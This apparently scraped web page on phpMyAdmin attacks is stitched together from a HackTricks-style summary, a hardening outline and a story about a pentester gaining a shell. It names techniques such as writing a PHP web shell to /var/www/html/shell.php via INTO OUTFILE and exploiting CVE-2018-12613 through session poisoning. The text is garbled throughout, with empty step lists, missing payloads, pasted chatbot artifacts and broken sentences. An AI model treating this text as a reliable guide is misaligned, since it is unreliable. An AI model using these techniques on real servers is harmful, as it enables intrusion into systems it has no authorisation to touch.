Phpmyadmin Hacktricks
Unlike a blind SQL injection vulnerability—which requires writing custom scripts, dealing with WAFs, and painstakingly extracting data one character at a time—phpMyAdmin offers a full, interactive SQL console. From an attacker’s perspective, this is equivalent to finding an unlocked backdoor into the server room.
The primary attack vectors can be summarized into three categories:
In versions < 4.6.2, a crafted .sql upload combined with preg_replace's /e modifier leads to code execution. Requires $cfg['AllowArbitraryServer']=true.
If the database user has FILE privileges, you can write a PHP shell directly to the web root.
Steps:
Common paths to try:
HackTricks reminds us that even without credentials, phpMyAdmin itself has had nasty RCE bugs:
These show that a fully patched phpMyAdmin is important, but an exposed, unpatched instance is a disaster waiting to happen.
If PHP is hardened and system is disabled, try: phpmyadmin hacktricks
This paper surveys common attack techniques, defensive mitigations, and secure administration practices related to phpMyAdmin — a widely used web-based MySQL/MariaDB administration tool. It aims to help system administrators, security engineers, and auditors understand typical threat vectors, exploit patterns, detection strategies, and hardening recommendations. The focus is on pragmatic, ethical guidance for securing deployments and auditing risk; offensive techniques are described at a high level to inform defenses only.
7.1. Network-Level Controls
7.2. Authentication & Access Control
7.3. HTTPS & Session Security
7.4. Principle of Least Privilege (PoLP)
7.5. Keep Software Updated
7.6. Disable Unused Features
7.7. File and Upload Protections
7.8. Configuration Management
7.9. Use Read-Only or Limited Interfaces for Routine Tasks
7.10. Backup & Recovery
This is a story about , a security researcher who used the HackTricks
methodology to turn a forgotten database portal into a complete system takeover. The Discovery
During a routine authorized assessment, Alex found a web server with a standard login page at /phpmyadmin
. Many admins leave this tool exposed to the public internet , which often serves as a primary entry point for attackers Alex tried common credentials like admin:password , but the system was locked. He then checked for the config.inc.php.bak
file—a common mistake where backup files containing plain-text passwords are left in the web directory. He found nothing, but he didn't give up. The Breakthrough Alex remembered a specific trick from the HackTricks pentesting guide : checking for setup scripts default configurations He navigated to /phpmyadmin/setup/ Common paths to try: HackTricks reminds us that
. While modern versions block this, this older server allowed him to see the configuration. Using a known local file inclusion (LFI) vulnerability (like the famous CVE-2018-12613
), Alex was able to execute a small piece of PHP code he had "poisoned" into his session data. From Database to Shell
Once he had authenticated, Alex didn't just want the data; he wanted the server. He followed these steps: Checking Privileges : He verified he had the
privilege, which is required to read or write files on the server phpMyAdmin Documentation The "Into Outfile" Trick
: He used a SQL command to write a simple "web shell" into the web root: "" "/var/www/html/shell.php" Use code with caution. Copied to clipboard Command Execution : By visiting ://example.com , he confirmed he was running commands as the The Lesson
Alex's report helped the company understand that tools like phpMyAdmin should never be exposed to the public. To prevent this, he recommended: Restricting Access or firewall rules to only allow specific IP addresses DigitalOcean Changing the URL : Moving the interface from /phpmyadmin to a random, obscure path
: Always running the latest version to patch known LFI and RCE vulnerabilities. specific SQL commands used for different types of database takeovers?
